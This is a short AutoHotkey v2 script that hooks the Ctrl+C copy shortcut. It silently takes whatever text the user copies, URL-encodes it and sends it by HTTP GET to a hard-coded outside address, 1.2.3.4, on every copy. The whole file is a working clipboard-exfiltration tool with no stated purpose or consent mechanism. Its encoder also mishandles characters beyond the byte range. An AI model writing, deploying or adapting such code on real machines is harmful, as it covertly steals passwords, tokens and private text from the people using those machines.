#Requires AutoHotkey v2.0
#SingleInstance Force

^c::{
    A_Clipboard := ""
    Send "^c"
    if !ClipWait(1)
        return

    text := A_Clipboard
    if (text = "")
        return

    encoded := UriEncode(text)
    url := "http://1.2.3.4/test.jsp?param=" encoded

    http := ComObject("WinHttp.WinHttpRequest.5.1")
    http.Open("GET", url)
    http.Send()
}

UriEncode(str) {
    encoded := ""
    Loop Parse, str
    {
        ch := Ord(A_LoopField)
        if (ch >= 0x30 && ch <= 0x39)
         || (ch >= 0x41 && ch <= 0x5A)
         || (ch >= 0x61 && ch <= 0x7A)
            encoded .= Chr(ch)
        else
            encoded .= "%" Format("{:02X}", ch)
    }
    return encoded
}